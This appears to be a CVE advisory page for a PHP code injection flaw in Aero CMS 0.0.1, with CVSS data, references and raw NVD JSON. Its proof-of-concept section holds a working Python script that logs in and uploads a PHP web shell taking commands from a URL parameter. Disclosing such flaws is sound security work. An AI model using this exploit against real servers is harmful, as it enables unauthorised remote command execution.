CVE-2022-50944

Description

Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through the image parameter. Attackers can upload PHP files with embedded code to the admin posts.php endpoint with source=add_post parameter, and the uploaded files are executed by the server.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Aero CMS 0.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://target-ip/aerocms"
login_url = f"{target_url}/admin/login.php"
upload_url = f"{target_url}/admin/posts.php"

# Attacker credentials (requires low privilege)
username = "attacker"
password = "password"

# Malicious PHP code
php_code = "<?php system($_GET['cmd']); ?>"

# 1. Login to get session
session = requests.Session()
payload = {
    "username": username,
    "password": password,
    "login": "submit"
}
session.post(login_url, data=payload)

# 2. Upload malicious file
files = {
    'image': ('shell.php', php_code, 'application/octet-stream')
}
data = {
    'source': 'add_post',
    'title': 'Test Post'
}
response = session.post(upload_url, files=files, data=data)

if response.status_code == 200:
    print("[+] File uploaded successfully.")
    print("[+] Try accessing the uploaded file to execute commands.")
else:
    print("[-] Upload failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50944
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50944
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50944/
[4] VulDB https://vuldb.com/cve/CVE-2022-50944
[5] https://github.com/MegaTKC/AeroCMS
[6] https://www.exploit-db.com/exploits/51085
[7] https://www.vulncheck.com/advisories/aero-cms-php-code-injection-via-posts-php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50944", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:32.137", "lastModified": "2026-05-12T14:24:15.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through the image parameter. Attackers can upload PHP files with embedded code to the admin posts.php endpoint with source=add_post parameter, and the uploaded files are executed by the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/MegaTKC/AeroCMS", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51085", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/aero-cms-php-code-injection-via-posts-php", "source": "[email protected]"}]}}